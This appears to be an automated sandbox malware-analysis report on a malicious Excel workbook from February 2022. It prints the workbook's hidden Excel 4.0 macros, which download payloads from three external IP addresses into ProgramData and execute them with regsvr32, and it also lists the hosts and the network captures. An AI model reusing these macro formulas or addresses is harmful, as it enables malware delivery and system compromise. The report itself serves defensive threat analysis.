    http://185.252.215.41/6516776391132270.dat100%Avira URL Cloudmalware
    http://188.165.62.32/6516776391132270.dat0%Avira URL Cloudsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://185.141.26.236/6516776391132270.dattrue
    • Avira URL Cloud: malware
    unknown
    http://185.252.215.41/6516776391132270.dattrue
    • Avira URL Cloud: malware
    unknown
    http://188.165.62.32/6516776391132270.datfalse
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    185.141.26.236
    unknownNetherlands
    60117HSAEfalse
    185.252.215.41
    unknownRussian Federation
    49619AIRMOBFRfalse
    188.165.62.32
    unknownFrance
    16276OVHFRfalse
    Joe Sandbox Version:34.0.0 Boulder Opal
    Analysis ID:572924
    Start date:15.02.2022
    Start time:22:54:08
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 4m 43s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:Summary-313689350-Feb-15.xlsb
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:8
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal80.expl.evad.winXLSB@7/4@0/3
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xlsb
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Found warning dialog
    • Click Ok
    • Found warning dialog
    • Click Ok
    • Found warning dialog
    • Click Ok
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
    • VT rate limit hit for: Summary-313689350-Feb-15.xlsb
    TimeTypeDescription
    22:55:29API Interceptor3x Sleep call for process: regsvr32.exe modified
    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    185.141.26.236Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
    • 185.141.26.236/2437620704597850.dat
    Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
    • 185.141.26.236/1825066150275900.dat
    185.252.215.41Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
    • 185.252.215.41/2437620704597850.dat
    Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
    • 185.252.215.41/1825066150275900.dat
    188.165.62.32Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
    • 188.165.62.32/2437620704597850.dat
    Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
    • 188.165.62.32/1825066150275900.dat
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    AIRMOBFRSummary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
    • 185.252.215.41
    Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
    • 185.252.215.41
    HSAESummary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
    • 185.141.26.236
    Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
    • 185.141.26.236
    ATT72994.htmlGet hashmaliciousBrowse
    • 185.141.25.244
    H7LG5mteEK.exeGet hashmaliciousBrowse
    • 185.244.150.84
    XKPppNZNEj.exeGet hashmaliciousBrowse
    • 185.244.150.84
    eeb0c6a760a7c9d17c02dbacf4f4715917caf3d111209.exeGet hashmaliciousBrowse
    • 185.117.75.139
    ub6vBoyZmA.exeGet hashmaliciousBrowse
    • 185.82.202.246
    Secure_Message_81.90.a1.00.00.htmGet hashmaliciousBrowse
    • 185.141.25.244
    Secure_Message_81.90.a1.00.00.htmGet hashmaliciousBrowse
    • 185.141.25.244
    ATT72994.htmlGet hashmaliciousBrowse
    • 185.141.25.244
    ATT72994.htmlGet hashmaliciousBrowse
    • 185.141.25.244
    Calculation-Letter-1683223396-Jan-25.xlsbGet hashmaliciousBrowse
    • 185.244.149.81
    Calculation-Letter-1683223396-Jan-25.xlsbGet hashmaliciousBrowse
    • 185.244.149.81
    Calculation-1889969399-Jan-24.xlsbGet hashmaliciousBrowse
    • 185.106.123.107
    Calculation-1889969399-Jan-24.xlsbGet hashmaliciousBrowse
    • 185.106.123.107
    hrttshkxhj.exeGet hashmaliciousBrowse
    • 185.198.57.61
    DG3kRWrQrf.exeGet hashmaliciousBrowse
    • 185.198.57.61
    2doPTKCqR8.exeGet hashmaliciousBrowse
    • 185.82.202.246
    9BF4C9B6C5E930CE91B84920A73D9111793E6D3147745.exeGet hashmaliciousBrowse
    • 185.117.73.137
    wh1m0JCs2K.exeGet hashmaliciousBrowse
    • 185.82.202.246
    OVHFREDD Update Form 08221732151.htmlGet hashmaliciousBrowse
    • 158.69.226.152
    Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
    • 188.165.62.32
    Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
    • 188.165.62.32
    OszQV1HEQJLo5FM.exeGet hashmaliciousBrowse
    • 51.161.116.202
    2lYxDlGzn9.dllGet hashmaliciousBrowse
    • 54.38.242.185
    bashirc.soGet hashmaliciousBrowse
    • 51.79.175.139
    JgLtXCuKO1.dllGet hashmaliciousBrowse
    • 158.69.222.101
    itUwRRwSGgIbxl9.exeGet hashmaliciousBrowse
    • 94.23.214.113
    arm7Get hashmaliciousBrowse
    • 164.132.129.172
    MBSetup.exeGet hashmaliciousBrowse
    • 94.23.1.92
    Invoice.xlsGet hashmaliciousBrowse
    • 54.36.91.62
    20221102_3647_463773,pdf.exeGet hashmaliciousBrowse
    • 94.23.87.86
    ahsok.sh4Get hashmaliciousBrowse
    • 46.105.173.200
    tDb0ggawON.exeGet hashmaliciousBrowse
    • 66.70.204.222
    lsass.exeGet hashmaliciousBrowse
    • 51.79.226.3
    6F2EKlap31.exeGet hashmaliciousBrowse
    • 213.186.33.5
    ZXAAhPUFkw.exeGet hashmaliciousBrowse
    • 51.91.236.255
    02132022769992.docGet hashmaliciousBrowse
    • 66.70.204.222
    No context
    No context
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 1152 x 649, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):241202
    Entropy (8bit):7.994790738722079
    Encrypted:true
    SSDEEP:6144:LafQTxwGF4p24e6RoPmj6M7R6SFENKq4WneZ:LacxGgF62PFNJno
    MD5:970E90E800998F92DF619BFA12784EDE
    SHA1:9602E3700EAE62493E6109B5A1592C53A75DA62C
    SHA-256:085DF183667B5E23760879126ADEF853988D519E39C18B5A7EBA4B17423D7B6C
    SHA-512:74926BDFA17E196D1A885F9FF51B139B14865430C494E6B598E8B05A8B3D1C6C2D0FF314D871F1074F367CBA5E7BD82CF050D1EBC29A46BA3E39B851E4049D0A
    Malicious:false
    Reputation:low
    Preview:.PNG........IHDR.............L.......sRGB.........gAMA......a.....pHYs..........+......IDATx^....E...3.{.&....0g..3.....y.w.%..y'...DA..$.Qr.9.,..%m..S=;,mX...x=..8..TW.......vP.V..Z.Kl> .h60...z@....rP...z..]<../9...9...9....p.%...%...%..\..n........W.C...p.%..\..n....W'../9....p.....:1.~.1.W'..8.....K.!.:1.~.1D.N.._r.....K.!.K.!.K.!.:1.~i....F......Nl:$A...d../.f../mr..2.... .t.........4.Y...g..7W..c.1\.!.~..O#.....5...apV'...9.......g..QN.....x{...b...!.K.!.K.!.:1....1.....\....a....!zub.=.!91.....\....a....!zub...c..N.....m..n.apV'.....K.!.:1$?...:1....,..Y.C.....%..\..n.?c...g1..b..W'..c...?c..N.._r..]r.......3....p.........S.}...."...`.....W.uLk..l=...%=8KP.<......7!A.)`2.8...~.......,..Y..n.ap......g1..b.......g....1...9..b....0$'...%..\..3.Eb....gub.=....<...08....1..b...08.j1dK.....g1....p{..3.Eb....g.3p~.0.h..<.M/^D.`.....Y.v.mv..........zI.a......sa.~......~.S......08....1..~s.....,..Y...:1.....q...1...%..\........08.....ap.H.....N...08....
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:Composite Document File V2 Document, Cannot read section info
    Category:dropped
    Size (bytes):1536
    Entropy (8bit):1.1464700112623651
    Encrypted:false
    SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
    MD5:72F5C05B7EA8DD6059BF59F50B22DF33
    SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
    SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
    SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
    Malicious:false
    Reputation:high, very likely benign file
    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):512
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:BF619EAC0CDF3F68D496EA9344137E8B
    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
    Malicious:false
    Reputation:high, very likely benign file
    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):165
    Entropy (8bit):1.4377382811115937
    Encrypted:false
    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
    MD5:797869BB881CFBCDAC2064F92B26E46F
    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
    Malicious:true
    Reputation:high, very likely benign file
    Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    File type:Microsoft Excel 2007+
    Entropy (8bit):7.964359292186393
    TrID:
    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
    • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
    • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
    • ZIP compressed archive (8000/1) 5.73%
    File name:Summary-313689350-Feb-15.xlsb
    File size:270134
    MD5:494a7ce828bec65273a9b49cefea91d7
    SHA1:dfab2f0d4759820ef1a769bbaa2d79b64218b7c9
    SHA256:e0b0146bdaabe240d92056c5b211e0b2d858f81aade2e06ca28f59bc2a229bed
    SHA512:6a82cb5eb51ba23303cb1519554cfac26a14dac0b693438d68eec1fd69d04148df6b5c402a2094f72ab95b590e68ff41e784566a1476eb8b4466f8094b60654c
    SSDEEP:6144:/VafQTxwGF4p24e6RoPmj6M7R6SFENKq4Wneb:tacxGgF62PFNJnq
    File Content Preview:PK..........!.........=.......[Content_Types].xml ...(...............................................................................................................................................................................II........................
    Icon Hash:e4e2ea8aa4b4b4b4
    Document Type:OpenXML
    Number of OLE Files:1
    Has Summary Info:
    Application Name:
    Encrypted Document:
    Contains Word Document Stream:
    Contains Workbook/Book Stream:
    Contains PowerPoint Document Stream:
    Contains Visio Document Stream:
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:
    Name:Tiposa1111
    Type:4
    Final:False
    Visible:False
    Protected:False
    Tiposa11114False0Falsepre21,5,=EXEC("regsvr32 C:\ProgramData\Hroser2.ocx")23,5,=GOTO(Tiposa11111!E10)
    Name:Tiposa
    Type:3
    Final:False
    Visible:False
    Protected:False
    Tiposa3False0Falsepre1,1,adfvga5eyaey4,9,345434,12,435,2,uiytnkkb65sisk5,9,75,14,436,14,367,0,ug7,1,strysrtyy8,1,yystrystry8,9,348,10,59,1,strstr9,16,34610,7,kd658d6imiyi10,8,34510,9,u11,2,srtusrt11,7,dkkkkt11,11,511,12,3512,1,srttatu12,2,srtuus12,9,r6713,1,ry13,2,yusruysrtuy13,7,65f8d6k8s13,10,713,14,3413,15,54314,0,uh14,1,tshhfthrs15,0,715,4,URLDownloadTo15,7,ycifyiy,fi15,10,ae4616,2,ru6u17,9,dt17,10,617,12,u17,13,518,8,yu18,10,sb18,14,519,3,JJCCBB19,7,tyinz20,0,720,1,tsyshary20,4,185.141.26.236/20,7,aerf644yvac5y20,8,u21,0,md21,3,121,4,185.252.215.41/21,9,s21,11,m22,1,rh22,3,922,4,188.165.62.32/22,8,623,4,423,11,423,15,4624,4,524,6,=GOTO(Vtreytr!F17)24,8,2324,14,624,15,4325,1,bysrthshtd25,4,625,10,2325,13,526,1,dghgfh28,2,hdhstys37,6,=GOTO(Tiposa1!G8)
    Name:Tiposa3
    Type:4
    Final:False
    Visible:False
    Protected:False
    Tiposa34False0Falsepre14,7,=GOTO(Detr!K18)
    Name:Tiposa6
    Type:4
    Final:False
    Visible:False
    Protected:False
    Tiposa64False0Falsepre19,7,=GOTO(Tiposa2!H20)
    Name:Detr
    Type:4
    Final:False
    Visible:False
    Protected:False
    Detr4False0Falsepost25,10,=GOTO(Xwtrd!G18)
    Name:Detr
    Type:4
    Final:False
    Visible:False
    Protected:False
    Detr4False0Falsepre25,10,=GOTO(Xwtrd!G18)
    Name:Tiposa2
    Type:4
    Final:False
    Visible:False
    Protected:False
    Tiposa24False0Falsepre14,7,=GOTO(Tiposa6!H10)21,7,=GOTO(Tiposa1!G21)28,7,=GOTO(Tiposa1!G29)
    Name:Vtreytr
    Type:4
    Final:False
    Visible:False
    Protected:False
    Vtreytr4False0Falsepost21,5,=REGISTER("uRlMon",Fola&"FileA","JJCCBB","Drwrgdfghfhf",,"1","9")24,5,=GOTO(Tiposa!G34)
    Name:Vtreytr
    Type:4
    Final:False
    Visible:False
    Protected:False
    Vtreytr4False0Falsepre21,5,=REGISTER("uRlMon",Fola&"FileA","JJCCBB","Drwrgdfghfhf",,"1","9")24,5,=GOTO(Tiposa!G34)
    Name:Xwtrd2
    Type:3
    Final:False
    Visible:False
    Protected:False
    Xwtrd23False0Falsepost16,5,=Drwrgdfghfhf(0,"http://188.165.62.32/6516776391132270.dat","C:\ProgramData\Hroser3.ocx",0,0)19,5,=GOTO(Xwtrd!G24)
    Name:Xwtrdferyy
    Type:3
    Final:False
    Visible:False
    Protected:False
    Xwtrdferyy3False0Falsepre13,3,=Drwrgdfghfhf(0,"http://185.252.215.41/7332413132139490.dat","C:\ProgramData\Hroser2.ocx",0,0)16,3,=GOTO(Xwtrd2!F14)
    Name:Tiposa11111
    Type:4
    Final:False
    Visible:False
    Protected:False
    Tiposa111114False0Falsepre11,4,=EXEC("regsvr32 C:\ProgramData\Hroser3.ocx")13,4,=GOTO(Tiposa1!G25)
    Name:Tiposa11111
    Type:4
    Final:False
    Visible:False
    Protected:False
    Tiposa111114False0Falsepost11,4,=EXEC("regsvr32 C:\ProgramData\Hroser3.ocx")13,4,=GOTO(Tiposa1!G25)
    Name:Xwtrd
    Type:3
    Final:False
    Visible:False
    Protected:False
    Xwtrd3False0Falsepost20,6,=Drwrgdfghfhf(0,"http://185.141.26.236/6516776391132270.dat","C:\ProgramData\Hroser1.ocx",0,0)21,6,=GOTO(Xwtrdferyy!D11)25,6,=GOTO(Tiposa2!H13)
    Name:Xwtrd
    Type:3
    Final:False
    Visible:False
    Protected:False
    Xwtrd3False0Falsepre20,6,=Drwrgdfghfhf(0,"http://185.141.26.236/7332413132139490.dat","C:\ProgramData\Hroser1.ocx",0,0)21,6,=GOTO(Xwtrdferyy!D11)25,6,=GOTO(Tiposa2!H13)
    Name:Tiposa3
    Type:4
    Final:False
    Visible:False
    Protected:False
    Tiposa34False0Falsepost14,7,=GOTO(Detr!K18)
    Name:Tiposa1
    Type:4
    Final:False
    Visible:False
    Protected:False
    Tiposa14False0Falsepost10,6,=RANDBETWEEN(213214234,9776980793567560)13,4,="C:\ProgramDat"18,4,=T(E20&E21)18,6,=GOTO(Tiposa3!H8)19,4,re20,4,gs21,6,=EXEC(E19&"vr32  "&E14&"a\Hroser1.ocx")22,6,=GOTO(Tiposa1111!F20)25,6,=GOTO(Tiposa2!H24)29,6,=RETURN()
    Name:Tiposa
    Type:3
    Final:False
    Visible:False
    Protected:False
    Tiposa3False0Falsepost1,1,adfvga5eyaey4,9,345434,12,435,2,uiytnkkb65sisk5,9,75,14,436,14,367,0,ug7,1,strysrtyy8,1,yystrystry8,9,348,10,59,1,strstr9,16,34610,7,kd658d6imiyi10,8,34510,9,u11,2,srtusrt11,7,dkkkkt11,11,511,12,3512,1,srttatu12,2,srtuus12,9,r6713,1,ry13,2,yusruysrtuy13,7,65f8d6k8s13,10,713,14,3413,15,54314,0,uh14,1,tshhfthrs15,0,715,4,URLDownloadTo15,7,ycifyiy,fi15,10,ae4616,2,ru6u17,9,dt17,10,617,12,u17,13,518,8,yu18,10,sb18,14,519,3,JJCCBB19,7,tyinz20,0,720,1,tsyshary20,4,185.141.26.236/20,7,aerf644yvac5y20,8,u21,0,md21,3,121,4,185.252.215.41/21,9,s21,11,m22,1,rh22,3,922,4,188.165.62.32/22,8,623,4,423,11,423,15,4624,4,524,6,=GOTO(Vtreytr!F17)24,8,2324,14,624,15,4325,1,bysrthshtd25,4,625,10,2325,13,526,1,dghgfh28,2,hdhstys37,6,=GOTO(Tiposa1!G8)
    Name:Tiposa6
    Type:4
    Final:False
    Visible:False
    Protected:False
    Tiposa64False0Falsepost19,7,=GOTO(Tiposa2!H20)
    Name:Xwtrd2
    Type:3
    Final:False
    Visible:False
    Protected:False
    Xwtrd23False0Falsepre16,5,=Drwrgdfghfhf(0,"http://188.165.62.32/7332413132139490.dat","C:\ProgramData\Hroser3.ocx",0,0)19,5,=GOTO(Xwtrd!G24)
    Name:Tiposa2
    Type:4
    Final:False
    Visible:False
    Protected:False
    Tiposa24False0Falsepost14,7,=GOTO(Tiposa6!H10)21,7,=GOTO(Tiposa1!G21)28,7,=GOTO(Tiposa1!G29)
    Name:Xwtrdferyy
    Type:3
    Final:False
    Visible:False
    Protected:False
    Xwtrdferyy3False0Falsepost13,3,=Drwrgdfghfhf(0,"http://185.252.215.41/6516776391132270.dat","C:\ProgramData\Hroser2.ocx",0,0)16,3,=GOTO(Xwtrd2!F14)
    Name:Tiposa1
    Type:4
    Final:False
    Visible:False
    Protected:False
    Tiposa14False0Falsepre10,6,=RANDBETWEEN(213214234,9776980793567560)13,4,="C:\ProgramDat"18,4,=T(E20&E21)18,6,=GOTO(Tiposa3!H8)19,4,re20,4,gs21,6,=EXEC(E19&"vr32  "&E14&"a\Hroser1.ocx")22,6,=GOTO(Tiposa1111!F20)25,6,=GOTO(Tiposa2!H24)29,6,=RETURN()
    Name:Tiposa1111
    Type:4
    Final:False
    Visible:False
    Protected:False
    Tiposa11114False0Falsepost21,5,=EXEC("regsvr32 C:\ProgramData\Hroser2.ocx")23,5,=GOTO(Tiposa11111!E10)
    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
    02/15/22-22:54:57.086061TCP1201ATTACK-RESPONSES 403 Forbidden8049165185.141.26.236192.168.2.22
    02/15/22-22:54:57.253675TCP1201ATTACK-RESPONSES 403 Forbidden8049166185.252.215.41192.168.2.22
    02/15/22-22:54:57.471397TCP1201ATTACK-RESPONSES 403 Forbidden8049167188.165.62.32192.168.2.22
    TimestampSource PortDest PortSource IPDest IP
    Feb 15, 2022 22:54:56.795377016 CET4916580192.168.2.22185.141.26.236
    Feb 15, 2022 22:54:56.835047960 CET8049165185.141.26.236192.168.2.22
    Feb 15, 2022 22:54:56.835242033 CET4916580192.168.2.22185.141.26.236
    Feb 15, 2022 22:54:56.836373091 CET4916580192.168.2.22185.141.26.236
    Feb 15, 2022 22:54:56.875855923 CET8049165185.141.26.236192.168.2.22
    Feb 15, 2022 22:54:57.086061001 CET8049165185.141.26.236192.168.2.22
    Feb 15, 2022 22:54:57.087491989 CET4916580192.168.2.22185.141.26.236
    Feb 15, 2022 22:54:57.103595972 CET4916680192.168.2.22185.252.215.41
    Feb 15, 2022 22:54:57.126019955 CET8049166185.252.215.41192.168.2.22
    Feb 15, 2022 22:54:57.129204988 CET4916680192.168.2.22185.252.215.41
    Feb 15, 2022 22:54:57.129985094 CET4916680192.168.2.22185.252.215.41
    Feb 15, 2022 22:54:57.152522087 CET8049166185.252.215.41192.168.2.22
    Feb 15, 2022 22:54:57.253674984 CET8049166185.252.215.41192.168.2.22
    Feb 15, 2022 22:54:57.253834963 CET4916680192.168.2.22185.252.215.41
    Feb 15, 2022 22:54:57.277570963 CET4916780192.168.2.22188.165.62.32
    Feb 15, 2022 22:54:57.304420948 CET8049167188.165.62.32192.168.2.22
    Feb 15, 2022 22:54:57.304588079 CET4916780192.168.2.22188.165.62.32
    Feb 15, 2022 22:54:57.305991888 CET4916780192.168.2.22188.165.62.32
    Feb 15, 2022 22:54:57.332709074 CET8049167188.165.62.32192.168.2.22
    Feb 15, 2022 22:54:57.471396923 CET8049167188.165.62.32192.168.2.22
    Feb 15, 2022 22:54:57.471524954 CET4916780192.168.2.22188.165.62.32
    Feb 15, 2022 22:56:02.104666948 CET8049165185.141.26.236192.168.2.22
    Feb 15, 2022 22:56:02.105359077 CET4916580192.168.2.22185.141.26.236
    Feb 15, 2022 22:56:02.274312019 CET8049166185.252.215.41192.168.2.22
    Feb 15, 2022 22:56:02.278918982 CET4916680192.168.2.22185.252.215.41
    Feb 15, 2022 22:56:02.486617088 CET8049167188.165.62.32192.168.2.22
    Feb 15, 2022 22:56:02.486912966 CET4916780192.168.2.22188.165.62.32
    Feb 15, 2022 22:56:56.702255011 CET4916780192.168.2.22188.165.62.32
    Feb 15, 2022 22:56:56.702528954 CET4916680192.168.2.22185.252.215.41
    Feb 15, 2022 22:56:56.702760935 CET4916580192.168.2.22185.141.26.236
    Feb 15, 2022 22:56:56.724756002 CET8049166185.252.215.41192.168.2.22
    Feb 15, 2022 22:56:56.728868961 CET8049167188.165.62.32192.168.2.22
    Feb 15, 2022 22:56:56.742151022 CET8049165185.141.26.236192.168.2.22
    • 185.141.26.236
    • 185.252.215.41
    • 188.165.62.32
    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.2249165185.141.26.23680C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    Feb 15, 2022 22:54:56.836373091 CET0OUTGET /6516776391132270.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 185.141.26.236
    Connection: Keep-Alive
    Feb 15, 2022 22:54:57.086061001 CET1INHTTP/1.1 403 Forbidden
    Server: nginx
    Date: Tue, 15 Feb 2022 21:55:38 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


    Session IDSource IPSource PortDestination IPDestination PortProcess
    1192.168.2.2249166185.252.215.4180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    Feb 15, 2022 22:54:57.129985094 CET1OUTGET /6516776391132270.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 185.252.215.41
    Connection: Keep-Alive
    Feb 15, 2022 22:54:57.253674984 CET2INHTTP/1.1 403 Forbidden
    Server: nginx
    Date: Tue, 15 Feb 2022 21:54:57 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 